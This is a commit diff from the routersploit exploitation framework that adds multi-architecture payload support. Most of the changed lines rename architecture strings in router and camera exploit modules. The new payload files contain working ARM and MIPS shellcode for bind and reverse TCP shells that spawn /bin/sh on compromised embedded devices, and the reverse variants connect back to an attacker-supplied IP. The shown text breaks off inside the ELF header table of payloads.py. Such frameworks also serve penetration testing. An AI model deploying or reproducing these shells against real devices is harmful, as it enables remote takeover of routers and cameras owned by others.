Skip to content

R
routersploit
Commit 1d37006f by Marcin Bury Committed by GitHub
Options

Payloads (#322) 

* Multiple payloads support

* RHost for bind shell

* Fixing payloads

* Validating parameters

* Architecture parameter

* Fixing payloads

* Fix pep

* Fixing tests

* Fixing ident
parent 592ff649
Showing with 747 additions and 366 deletions
routersploit/__init__.py
......@@ -17,6 +17,8 @@ from routersploit.utils import (
)
from routersploit import exploits
from routersploit import payloads
from routersploit import wordlists
from routersploit import validators
from routersploit.shell import shell
routersploit/exploits.py
......@@ -74,7 +74,7 @@ class Exploit(object):
""" Base class for exploits. """
__metaclass__ = ExploitOptionsAggregator
target = Option(default="", description="Target IP address.")
# target = Option(default="", description="Target IP address.")
# port = Option(default="", description="Target port.")
@property
......
routersploit/modules/exploits/cameras/multi/P2P_wificam_rce.py
......@@ -1296,7 +1296,7 @@ class Exploit(exploits.Exploit):
print_success("Target is vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available. Use reverse_tcp <reverse ip> <port>")
shell(self, architecture="mips", method="wget", binary="wget", location="/tmp")
shell(self, architecture="mipsbe", method="wget", binary="wget", location="/tmp")
else:
print_error("Exploit failed. Device seems to be not vulnerable.")
......
routersploit/modules/exploits/misc/asus/b1m_projector_rce.py
......@@ -38,7 +38,7 @@ class Exploit(exploits.Exploit):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mips")
shell(self, architecture="mipsbe")
else:
print_error("Target is not vulnerable")
......
routersploit/modules/exploits/misc/wepresent/wipg1000_rce.py
......@@ -38,7 +38,7 @@ class Exploit(exploits.Exploit):
if self.check():
print_success("Target seems to be vulnerable")
print_status("This is blind command injection, response is not available")
shell(self, architecture="mips", binary="netcat", shell="/bin/sh")
shell(self, architecture="mipsbe", binary="netcat", shell="/bin/sh")
else:
print_error("Exploit failed - exploit seems to be not vulnerable")
......
routersploit/modules/exploits/routers/3com/officeconnect_rce.py
......@@ -40,7 +40,7 @@ class Exploit(exploits.Exploit):
print_success("Target is vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available")
shell(self, architecture="mips")
shell(self, architecture="mipsbe")
else:
print_error("Target is not vulnerable")
......
routersploit/modules/exploits/routers/asmax/ar_804_gu_rce.py
......@@ -41,7 +41,7 @@ class Exploit(exploits.Exploit):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mips")
shell(self, architecture="mipsbe")
else:
print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/asus/infosvr_backdoor_rce.py
......@@ -54,7 +54,7 @@ class Exploit(exploits.Exploit):
print_status("Invoking command loop...")
print_status("Please note that only first 256 characters of the "
"output will be displayed or use reverse_tcp")
shell(self, architecture="arm", method="wget", binary="wget", location="/tmp")
shell(self, architecture="armle", method="wget", binary="wget", location="/tmp")
else:
print_error("Target is not vulnerable")
except socket.error as ex:
......
routersploit/modules/exploits/routers/belkin/n750_rce.py
......@@ -40,7 +40,7 @@ class Exploit(exploits.Exploit):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mips")
shell(self, architecture="mipsbe")
else:
print_error("Target is not vulnerable")
......
routersploit/modules/exploits/routers/bhu/bhu_urouter_rce.py
......@@ -40,7 +40,7 @@ class Exploit(exploits.Exploit):
print_status('\t- Inject "CMD &gt; /usr/share/www/routersploit.check"')
print_status('\t- The result of CMD will be available at {}:{}/routersploit.check'.format(self.target, self.port))
print_status("Invoking command loop (type 'exit' or 'quit' to exit the loop)...")
shell(self, architecture='mips')
shell(self, architecture="mipsbe")
else:
print_error('Target is not vulnerable')
......
routersploit/modules/exploits/routers/dlink/dcs_930l_auth_rce.py
......@@ -40,7 +40,7 @@ class Exploit(exploits.Exploit):
print_success("Target is vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available")
shell(self, architecture="mipsel")
shell(self, architecture="mipsle")
else:
print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py
......@@ -41,7 +41,7 @@ class Exploit(exploits.Exploit):
print_success("Target seems to be vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available")
shell(self, architecture="mipsel")
shell(self, architecture="mipsle")
else:
print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/dlink/dir_645_815_rce.py
......@@ -46,7 +46,7 @@ class Exploit(exploits.Exploit):
print_success("Target is vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available")
shell(self, architecture="mipsel", method="echo", binary="echo", location="/var/tmp/")
shell(self, architecture="mipsle", method="echo", binary="echo", location="/var/tmp/")
else:
print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py
......@@ -35,7 +35,7 @@ class Exploit(exploits.Exploit):
print_status("It's not possible to check if the target is vulnerable. Try to use following command loop.")
print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available")
shell(self, architecture="mipsel")
shell(self, architecture="mipsle")
def execute(self, cmd):
buf = ('M-SEARCH * HTTP/1.1\r\n'
......
routersploit/modules/exploits/routers/dlink/dsp_w110_rce.py
......@@ -39,7 +39,7 @@ class Exploit(exploits.Exploit):
print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available.")
print_status("Spawn root shell with telnetd -l/bin/sh")
shell(self, architecture="mips")
shell(self, architecture="mipsbe")
else:
print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/dlink/multi_hnap_rce.py
......@@ -52,7 +52,7 @@ class Exploit(exploits.Exploit):
print_status("Target might be vulnerable - it is hard to verify")
print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available")
shell(self, architecture="mipsel")
shell(self, architecture="mipsle")
else:
print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/linksys/wrt100_110_rce.py
......@@ -47,7 +47,7 @@ class Exploit(exploits.Exploit):
if self.test_auth():
print_status("Invoking command loop...")
print_status("This is blind command injection. Response is not available.")
shell(self, architecture="mipsel")
shell(self, architecture="mipsle")
else:
print_error("Target is not vulnerable")
......
routersploit/modules/exploits/routers/netcore/udp_53413_rce.py
......@@ -38,7 +38,7 @@ class Exploit(exploits.Exploit):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsel", method="wget", binary="wget", location="/var")
shell(self, architecture="mipsle", method="wget", binary="wget", location="/var")
else:
print_error("Target is not vulnerable")
......
routersploit/modules/exploits/routers/netgear/dgn2200_dnslookup_cgi_rce.py
......@@ -41,7 +41,7 @@ class Exploit(exploits.Exploit):
print_status("It is not possible to check if target is vulnerable")
print_status("Trying to invoke command loop...")
print_status("It is blind command injection. Response is not available.")
shell(self, architecture="mips")
shell(self, architecture="mipsbe")
def execute(self, cmd):
url = "{}:{}/dnslookup.cgi".format(self.target, self.port)
......
routersploit/modules/exploits/routers/netgear/dgn2200_ping_cgi_rce.py
......@@ -47,7 +47,7 @@ class Exploit(exploits.Exploit):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mips")
shell(self, architecture="mipsbe")
else:
print_error("Target is not vulnerable")
......
routersploit/modules/exploits/routers/netgear/multi_rce.py
......@@ -60,9 +60,9 @@ class Exploit(exploits.Exploit):
print_status("It is blind command injection - response is not available. Use reverse_tcp <reverse ip> <port>")
if self.arch == "mipsbe":
shell(self, architecture="mips", method="wget", binary="wget", location="/tmp")
shell(self, architecture="mipsbe", method="wget", binary="wget", location="/tmp")
elif self.arch == "mipsle":
shell(self, architecture="mipsel", method="wget", binary="wget", location="/tmp")
shell(self, architecture="mipsle", method="wget", binary="wget", location="/tmp")
else:
print_error("Target is not vulnerable")
......
routersploit/modules/exploits/routers/netgear/r7000_r6400_rce.py
......@@ -48,7 +48,7 @@ class Exploit(exploits.Exploit):
print_success("Target is probably vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection. Try to start telnet with telnet telnetd -p '4445'")
shell(self, architecture="arm")
shell(self, architecture="armle")
else:
print_error("Target is not vulnerable")
......
routersploit/modules/exploits/routers/netsys/multi_rce.py
......@@ -46,7 +46,7 @@ class Exploit(exploits.Exploit):
if self.check():
print_success("Target seems to be vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsel")
shell(self, architecture="mipsle")
else:
print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/tplink/archer_c2_c20i_rce.py
......@@ -43,7 +43,7 @@ class Exploit(exploits.Exploit):
print_status("It is blind command injection so response is not available")
# requires testing
shell(self, architecture="mips", method="wget", binary="wget", location="/tmp")
shell(self, architecture="mipsbe", method="wget", binary="wget", location="/tmp")
else:
print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/zte/zxv10_rce.py
......@@ -50,7 +50,7 @@ class Exploit(exploits.Exploit):
self.info()
print_status("Invoking command loop")
shell(self, architecture="mips", method="wget", binary="wget", location="/tmp")
shell(self, architecture="mipsbe", method="wget", binary="wget", location="/tmp")
else:
print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/zyxel/d1000_rce.py
......@@ -41,7 +41,7 @@ class Exploit(exploits.Exploit):
print_success("Target appears to be vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available")
shell(self, architecture="mips")
shell(self, architecture="mipsbe")
else:
print_error("Target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/zyxel/p660hn-t_v1_rce.py
......@@ -33,15 +33,15 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target port', validators=validators.integer)
def run(self):
if self.check():
print_success("Target appears to be vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available")
shell(self, architecture="mips")
shell(self, architecture="mipsbe")
else:
print_error("Target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/zyxel/p660hn-t_v2_rce.py
......@@ -48,7 +48,7 @@ class Exploit(exploits.Exploit):
print_success("Target appears to be vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available. Command length up to 28 characters.")
shell(self, architecture="mips")
shell(self, architecture="mipsbe")
else:
print_error("Target seems to be not vulnerable")
......
routersploit/modules/payloads/__init__.py 0 → 100644
from . import armle_bind_tcp
from . import armle_reverse_tcp
from . import mipsbe_bind_tcp
from . import mipsbe_reverse_tcp
from . import mipsle_bind_tcp
from . import mipsle_reverse_tcp
routersploit/modules/payloads/armle_bind_tcp.py 0 → 100644
from routersploit import (
exploits,
payloads,
validators
)
class Exploit(payloads.Payload):
__info__ = {
'name': 'ARMLE Bind TCP',
'authors': [
],
'description': '',
'references': [
],
'devices': [
],
}
architecture = "armle"
port = exploits.Option(5555, 'Bind Port', validators=validators.integer)
def generate(self):
bind_port = self.convert_port(self.port)
self.payload = (
"\x02\x00\xa0\xe3" +
"\x01\x10\xa0\xe3" +
"\x06\x20\xa0\xe3" +
"\x07\x00\x2d\xe9" +
"\x01\x00\xa0\xe3" +
"\x0d\x10\xa0\xe1" +
"\x66\x00\x90\xef" +
"\x0c\xd0\x8d\xe2" +
"\x00\x60\xa0\xe1" +
bind_port[1] + "\x10\xa0\xe3" +
bind_port[0] + "\x70\xa0\xe3" +
"\x01\x1c\xa0\xe1" +
"\x07\x18\x81\xe0" +
"\x02\x10\x81\xe2" +
"\x02\x20\x42\xe0" +
"\x06\x00\x2d\xe9" +
"\x0d\x10\xa0\xe1" +
"\x10\x20\xa0\xe3" +
"\x07\x00\x2d\xe9" +
"\x02\x00\xa0\xe3" +
"\x0d\x10\xa0\xe1" +
"\x66\x00\x90\xef" +
"\x14\xd0\x8d\xe2" +
"\x06\x00\xa0\xe1" +
"\x03\x00\x2d\xe9" +
"\x04\x00\xa0\xe3" +
"\x0d\x10\xa0\xe1" +
"\x66\x00\x90\xef" +
"\x08\xd0\x8d\xe2" +
"\x06\x00\xa0\xe1" +
"\x01\x10\x41\xe0" +
"\x02\x20\x42\xe0" +
"\x07\x00\x2d\xe9" +
"\x05\x00\xa0\xe3" +
"\x0d\x10\xa0\xe1" +
"\x66\x00\x90\xef" +
"\x0c\xd0\x8d\xe2" +
"\x00\x60\xa0\xe1" +
"\x02\x10\xa0\xe3" +
"\x06\x00\xa0\xe1" +
"\x3f\x00\x90\xef" +
"\x01\x10\x51\xe2" +
"\xfb\xff\xff\x5a" +
"\x04\x10\x4d\xe2" +
"\x02\x20\x42\xe0" +
"\x2f\x30\xa0\xe3" +
"\x62\x70\xa0\xe3" +
"\x07\x34\x83\xe0" +
"\x69\x70\xa0\xe3" +
"\x07\x38\x83\xe0" +
"\x6e\x70\xa0\xe3" +
"\x07\x3c\x83\xe0" +
"\x2f\x40\xa0\xe3" +
"\x73\x70\xa0\xe3" +
"\x07\x44\x84\xe0" +
"\x68\x70\xa0\xe3" +
"\x07\x48\x84\xe0" +
"\x73\x50\xa0\xe3" +
"\x68\x70\xa0\xe3" +
"\x07\x54\x85\xe0" +
"\x3e\x00\x2d\xe9" +
"\x08\x00\x8d\xe2" +
"\x00\x10\x8d\xe2" +
"\x04\x20\x8d\xe2" +
"\x0b\x00\x90\xef"
)
routersploit/modules/payloads/armle_reverse_tcp.py 0 → 100644
from routersploit import (
exploits,
payloads,
validators,
)
class Exploit(payloads.Payload):
__info__ = {
'name': 'ARMLE Reverse TCP',
'authors': [
],
'description': '',
'references': [
],
'devices': [
],
}
architecture = "armle"
target = exploits.Option('', 'Reverse IP', validators=validators.ipv4)
port = exploits.Option(5555, 'Reverse TCP Port', validators=validators.integer)
def generate(self):
reverse_ip = self.convert_ip(self.target)
reverse_port = self.convert_port(self.port)
self.payload = (
"\x01\x10\x8F\xE2" +
"\x11\xFF\x2F\xE1" +
"\x02\x20\x01\x21" +
"\x92\x1A\x0F\x02" +
"\x19\x37\x01\xDF" +
"\x06\x1C\x08\xA1" +
"\x10\x22\x02\x37" +
"\x01\xDF\x3F\x27" +
"\x02\x21\x30\x1c" +
"\x01\xdf\x01\x39" +
"\xFB\xD5\x05\xA0" +
"\x92\x1a\x05\xb4" +
"\x69\x46\x0b\x27" +
"\x01\xDF\xC0\x46" +
"\x02\x00" + reverse_port + # "\x12\x34" struct sockaddr and port
reverse_ip + # reverse ip address
"\x2f\x62\x69\x6e" + # /bin
"\x2f\x73\x68\x00" # /sh\0
)
routersploit/modules/payloads/mipsbe_bind_tcp.py 0 → 100644
from routersploit import (
exploits,
payloads,
validators
)
class Exploit(payloads.Payload):
__info__ = {
'name': 'MIPSBE Bind TCP',
'authors': [
],
'description': '',
'references': [
],
'devices': [
],
}
architecture = "mipsbe"
port = exploits.Option(5555, 'Bind Port', validators=validators.integer)
def generate(self):
bind_port = self.convert_port(self.port)
self.payload = (
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
"\x27\xbd\xff\xe0" + # addiu sp,sp,-32
"\x24\x0e\xff\xfd" + # li t6,-3
"\x01\xc0\x20\x27" + # nor a0,t6,zero
"\x01\xc0\x28\x27" + # nor a1,t6,zero
"\x28\x06\xff\xff" + # slti a2,zero,-1
"\x24\x02\x10\x57" + # li v0,4183 ( __NR_socket )
"\x01\x01\x01\x0c" + # syscall
# bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
"\x30\x50\xff\xff" + # andi s0,v0,0xffff
"\x24\x0e\xff\xef" + # li t6,-17 ; t6: 0xffffffef
"\x01\xc0\x70\x27" + # nor t6,t6,zero ; t6: 0x10 (16)
"\x24\x0d\xff\xfd" + # li t5,-3 ; t5: -3
"\x01\xa0\x68\x27" + # nor t5,t5,zero ; t5: 0x2
"\x01\xcd\x68\x04" + # sllv t5,t5,t6 ; t5: 0x00020000
"\x24\x0e" + bind_port + # li t6,0xFFFF (port) ; t6: 0x115c (4444 (default LPORT))
"\x01\xae\x68\x25" + # or t5,t5,t6 ; t5: 0x0002115c
"\xaf\xad\xff\xe0" + # sw t5,-32(sp)
"\xaf\xa0\xff\xe4" + # sw zero,-28(sp)
"\xaf\xa0\xff\xe8" + # sw zero,-24(sp)
"\xaf\xa0\xff\xec" + # sw zero,-20(sp)
"\x02\x10\x20\x25" + # or a0,s0,s0
"\x24\x0e\xff\xef" + # li t6,-17
"\x01\xc0\x30\x27" + # nor a2,t6,zero
"\x23\xa5\xff\xe0" + # addi a1,sp,-32
"\x24\x02\x10\x49" + # li v0,4169 ( __NR_bind )A
"\x01\x01\x01\x0c" + # syscall
# listen(3, 257) = 0
"\x02\x10\x20\x25" + # or a0,s0,s0
"\x24\x05\x01\x01" + # li a1,257
"\x24\x02\x10\x4e" + # li v0,4174 ( __NR_listen )
"\x01\x01\x01\x0c" + # syscall
# accept(3, 0, NULL) = 4
"\x02\x10\x20\x25" + # or a0,s0,s0
"\x28\x05\xff\xff" + # slti a1,zero,-1
"\x28\x06\xff\xff" + # slti a2,zero,-1
"\x24\x02\x10\x48" + # li v0,4168 ( __NR_accept )
"\x01\x01\x01\x0c" + # syscall
# dup2(4, 2) = 2
# dup2(4, 1) = 1
# dup2(4, 0) = 0
"\xaf\xa2\xff\xff" + # sw v0,-1(sp) # socket
"\x24\x11\xff\xfd" + # li s1,-3
"\x02\x20\x88\x27" + # nor s1,s1,zero
"\x8f\xa4\xff\xff" + # lw a0,-1(sp)
"\x02\x20\x28\x21" + # move a1,s1 # dup2_loop
"\x24\x02\x0f\xdf" + # li v0,4063 ( __NR_dup2 )
"\x01\x01\x01\x0c" + # syscall 0x40404
"\x24\x10\xff\xff" + # li s0,-1
"\x22\x31\xff\xff" + # addi s1,s1,-1
"\x16\x30\xff\xfa" + # bne s1,s0 <dup2_loop>
# execve("//bin/sh", ["//bin/sh"], [/* 0 vars */]) = 0
"\x28\x06\xff\xff" + # slti a2,zero,-1
"\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f "//"
"\x35\xef\x62\x69" + # ori t7,t7,0x6269 "bi"
"\xaf\xaf\xff\xec" + # sw t7,-20(sp)
"\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f "n/"
"\x35\xce\x73\x68" + # ori t6,t6,0x7368 "sh"
"\xaf\xae\xff\xf0" + # sw t6,-16(sp)
"\xaf\xa0\xff\xf4" + # sw zero,-12(sp)
"\x27\xa4\xff\xec" + # addiu a0,sp,-20
"\xaf\xa4\xff\xf8" + # sw a0,-8(sp)
"\xaf\xa0\xff\xfc" + # sw zero,-4(sp)
"\x27\xa5\xff\xf8" + # addiu a1,sp,-8
"\x24\x02\x0f\xab" + # li v0,4011 ( __NR_execve )
"\x01\x01\x01\x0c" # syscall 0x40404
)
routersploit/modules/payloads/mipsbe_reverse_tcp.py 0 → 100644
from routersploit import (
exploits,
payloads,
validators,
)
class Exploit(payloads.Payload):
__info__ = {
'name': 'MIPSBE Reverse TCP',
'authors': [
],
'description': '',
'references': [
],
'devices': [
],
}
architecture = "mipsbe"
target = exploits.Option('', 'Reverse IP', validators=validators.ipv4)
port = exploits.Option(5555, 'Reverse TCP Port', validators=validators.integer)
def generate(self):
reverse_ip = self.convert_ip(self.target)
reverse_port = self.convert_port(self.port)
self.payload = (
"\x28\x04\xff\xff" + # slti a0,zero,-1
"\x24\x02\x0f\xa6" + # li v0,4006
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x28\x04\x11\x11" + # slti a0,zero,4369
"\x24\x02\x0f\xa6" + # li v0,4006
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x24\x0c\xff\xfd" + # li t4,-3
"\x01\x80\x20\x27" + # nor a0,t4,zero
"\x24\x02\x0f\xa6" + # li v0,4006
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x24\x0c\xff\xfd" + # li t4,-3
"\x01\x80\x20\x27" + # nor a0,t4,zero
"\x01\x80\x28\x27" + # nor a1,t4,zero
"\x28\x06\xff\xff" + # slti a2,zero,-1
"\x24\x02\x10\x57" + # li v0,4183
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x30\x44\xff\xff" + # andi a0,v0,0xffff
"\x24\x02\x0f\xc9" + # li v0,4041
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x24\x02\x0f\xc9" + # li v0,4041
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x3c\x05\x00\x02" + # lui a1,0x2
"\x34\xa5" + reverse_port + # "\x7a\x69" # ori a1,a1,0x7a69
"\xaf\xa5\xff\xf8" + # sw a1,-8(sp)
"\x3c\x05" + reverse_ip[:2] + # "\xc0\xa8" # lui a1,0xc0a8
"\x34\xa5" + reverse_ip[2:] + # "\x01\x37" # ori a1,a1,0x137
"\xaf\xa5\xff\xfc" + # sw a1,-4(sp)
"\x23\xa5\xff\xf8" + # addi a1,sp,-8
"\x24\x0c\xff\xef" + # li t4,-17
"\x01\x80\x30\x27" + # nor a2,t4,zero
"\x24\x02\x10\x4a" + # li v0,4170
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x3c\x08\x2f\x2f" + # lui t0,0x2f2f
"\x35\x08\x62\x69" + # ori t0,t0,0x6269
"\xaf\xa8\xff\xec" + # sw t0,-20(sp)
"\x3c\x08\x6e\x2f" + # lui t0,0x6e2f
"\x35\x08\x73\x68" + # ori t0,t0,0x7368
"\xaf\xa8\xff\xf0" + # sw t0,-16(sp)
"\x28\x07\xff\xff" + # slti a3,zero,-1
"\xaf\xa7\xff\xf4" + # sw a3,-12(sp)
"\xaf\xa7\xff\xfc" + # sw a3,-4(sp)
"\x23\xa4\xff\xec" + # addi a0,sp,-20
"\x23\xa8\xff\xec" + # addi t0,sp,-20
"\xaf\xa8\xff\xf8" + # sw t0,-8(sp)
"\x23\xa5\xff\xf8" + # addi a1,sp,-8
"\x27\xbd\xff\xec" + # addiu sp,sp,-20
"\x28\x06\xff\xff" + # slti a2,zero,-1
"\x24\x02\x0f\xab" + # li v0,4011
"\x00\x90\x93\x4c" # syscall 0x2424d
)
routersploit/modules/payloads/mipsle_bind_tcp.py 0 → 100644
from routersploit import (
exploits,
payloads,
validators,
)
class Exploit(payloads.Payload):
__info__ = {
'name': 'MIPSLE Bind TCP',
'authors': [
],
'description': '',
'references': [
],
'devices': [
],
}
architecture = "mipsle"
port = exploits.Option(5555, 'Bind Port', validators=validators.integer)
def generate(self):
bind_port = self.convert_port(self.port)
self.payload = (
"\xe0\xff\xbd\x27" + # addiu sp,sp,-32
"\xfd\xff\x0e\x24" + # li t6,-3
"\x27\x20\xc0\x01" + # nor a0,t6,zero
"\x27\x28\xc0\x01" + # nor a1,t6,zero
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\x57\x10\x02\x24" + # li v0,4183 ( __NR_socket )
"\x0c\x01\x01\x01" + # syscall
"\xff\xff\x50\x30" + # andi s0,v0,0xffff
"\xef\xff\x0e\x24" + # li t6,-17 ; t6: 0xffffffef
"\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x10 (16)
bind_port + "\x0d\x24" + # li t5,0xFFFF (port) ; t5: 0x5c11 (0x115c == 4444 (default LPORT))
"\x04\x68\xcd\x01" + # sllv t5,t5,t6 ; t5: 0x5c110000
"\xfd\xff\x0e\x24" + # li t6,-3 ; t6: -3
"\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x2
"\x25\x68\xae\x01" + # or t5,t5,t6 ; t5: 0x5c110002
"\xe0\xff\xad\xaf" + # sw t5,-32(sp)
"\xe4\xff\xa0\xaf" + # sw zero,-28(sp)
"\xe8\xff\xa0\xaf" + # sw zero,-24(sp)
"\xec\xff\xa0\xaf" + # sw zero,-20(sp)
"\x25\x20\x10\x02" + # or a0,s0,s0
"\xef\xff\x0e\x24" + # li t6,-17
"\x27\x30\xc0\x01" + # nor a2,t6,zero
"\xe0\xff\xa5\x23" + # addi a1,sp,-32
"\x49\x10\x02\x24" + # li v0,4169 ( __NR_bind )A
"\x0c\x01\x01\x01" + # syscall
"\x25\x20\x10\x02" + # or a0,s0,s0
"\x01\x01\x05\x24" + # li a1,257
"\x4e\x10\x02\x24" + # li v0,4174 ( __NR_listen )
"\x0c\x01\x01\x01" + # syscall
"\x25\x20\x10\x02" + # or a0,s0,s0
"\xff\xff\x05\x28" + # slti a1,zero,-1
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\x48\x10\x02\x24" + # li v0,4168 ( __NR_accept )
"\x0c\x01\x01\x01" + # syscall
"\xff\xff\xa2\xaf" + # sw v0,-1(sp) # socket
"\xfd\xff\x11\x24" + # li s1,-3
"\x27\x88\x20\x02" + # nor s1,s1,zero
"\xff\xff\xa4\x8f" + # lw a0,-1(sp)
"\x21\x28\x20\x02" + # move a1,s1 # dup2_loop
"\xdf\x0f\x02\x24" + # li v0,4063 ( __NR_dup2 )
"\x0c\x01\x01\x01" + # syscall 0x40404
"\xff\xff\x10\x24" + # li s0,-1
"\xff\xff\x31\x22" + # addi s1,s1,-1
"\xfa\xff\x30\x16" + # bne s1,s0 <dup2_loop>
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\x62\x69\x0f\x3c" + # lui t7,0x2f2f "bi"
"\x2f\x2f\xef\x35" + # ori t7,t7,0x6269 "//"
"\xec\xff\xaf\xaf" + # sw t7,-20(sp)
"\x73\x68\x0e\x3c" + # lui t6,0x6e2f "sh"
"\x6e\x2f\xce\x35" + # ori t6,t6,0x7368 "n/"
"\xf0\xff\xae\xaf" + # sw t6,-16(sp)
"\xf4\xff\xa0\xaf" + # sw zero,-12(sp)
"\xec\xff\xa4\x27" + # addiu a0,sp,-20
"\xf8\xff\xa4\xaf" + # sw a0,-8(sp)
"\xfc\xff\xa0\xaf" + # sw zero,-4(sp)
"\xf8\xff\xa5\x27" + # addiu a1,sp,-8
"\xab\x0f\x02\x24" + # li v0,4011 ( __NR_execve )
"\x0c\x01\x01\x01" # syscall 0x40404
)
routersploit/modules/payloads/mipsle_reverse_tcp.py 0 → 100644
from routersploit import (
exploits,
payloads,
validators,
)
class Exploit(payloads.Payload):
__info__ = {
'name': 'MIPSLE Reverse TCP',
'authors': [
],
'description': '',
'references': [
],
'devices': [
],
}
architecture = "mipsle"
target = exploits.Option('', 'Reverse IP', validators=validators.ipv4)
port = exploits.Option(5555, 'Reverse TCP port', validators=validators.integer)
def generate(self):
reverse_ip = self.convert_ip(self.target)
reverse_port = self.convert_port(self.port)
self.payload = (
"\xff\xff\x04\x28" + # slti a0,zero,-1
"\xa6\x0f\x02\x24" + # li v0,4006
"\x0c\x09\x09\x01" + # syscall 0x42424
"\x11\x11\x04\x28" + # slti a0,zero,4369
"\xa6\x0f\x02\x24" + # li v0,4006
"\x0c\x09\x09\x01" + # syscall 0x42424
"\xfd\xff\x0c\x24" + # li t4,-3
"\x27\x20\x80\x01" + # nor a0,t4,zero
"\xa6\x0f\x02\x24" + # li v0,4006
"\x0c\x09\x09\x01" + # syscall 0x42424
"\xfd\xff\x0c\x24" + # li t4,-3
"\x27\x20\x80\x01" + # nor a0,t4,zero
"\x27\x28\x80\x01" + # nor a1,t4,zero
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\x57\x10\x02\x24" + # li v0,4183
"\x0c\x09\x09\x01" + # syscall 0x42424
"\xff\xff\x44\x30" + # andi a0,v0,0xffff
"\xc9\x0f\x02\x24" + # li v0,4041
"\x0c\x09\x09\x01" + # syscall 0x42424
"\xc9\x0f\x02\x24" + # li v0,4041
"\x0c\x09\x09\x01" + # syscall 0x42424
reverse_port + "\x05\x3c" + # "\x7a\x69" lui a1,0x697a
"\x02\x00\xa5\x34" + # ori a1,a1,0x2
"\xf8\xff\xa5\xaf" + # sw a1,-8(sp)
reverse_ip[2:] + "\x05\x3c" + # "\x00\x01" lui a1,0x100
reverse_ip[:2] + "\xa5\x34" + # "\x7f\x00" ori a1,a1,0x7f
"\xfc\xff\xa5\xaf" + # sw a1,-4(sp)
"\xf8\xff\xa5\x23" + # addi a1,sp,-8
"\xef\xff\x0c\x24" + # li t4,-17
"\x27\x30\x80\x01" + # nor a2,t4,zero
"\x4a\x10\x02\x24" + # li v0,4170
"\x0c\x09\x09\x01" + # syscall 0x42424
"\x62\x69\x08\x3c" + # lui t0,0x6962
"\x2f\x2f\x08\x35" + # ori t0,t0,0x2f2f
"\xec\xff\xa8\xaf" + # sw t0,-20(sp)
"\x73\x68\x08\x3c" + # lui t0,0x6873
"\x6e\x2f\x08\x35" + # ori t0,t0,0x2f6e
"\xf0\xff\xa8\xaf" + # sw t0,-16(sp)
"\xff\xff\x07\x28" + # slti a3,zero,-1
"\xf4\xff\xa7\xaf" + # sw a3,-12(sp)
"\xfc\xff\xa7\xaf" + # sw a3,-4(sp)
"\xec\xff\xa4\x23" + # addi a0,sp,-20
"\xec\xff\xa8\x23" + # addi t0,sp,-20
"\xf8\xff\xa8\xaf" + # sw t0,-8(sp)
"\xf8\xff\xa5\x23" + # addi a1,sp,-8
"\xec\xff\xbd\x27" + # addiu sp,sp,-20
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\xab\x0f\x02\x24" + # li v0,4011
"\x0c\x09\x09\x01" # syscall 0x42424
)
routersploit/payloads.py 0 → 100644
#!/usr/bin/env python
from struct import pack
import exploits
from utils import (
print_success,
print_status,
print_info,
print_error,
random_text
)
ARCH_ELF_HEADERS = {
"armle": ("\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x02\x00\x28\x00\x01\x00\x00\x00\x54\x80\x00\x00\x34\x00\x00\x00"
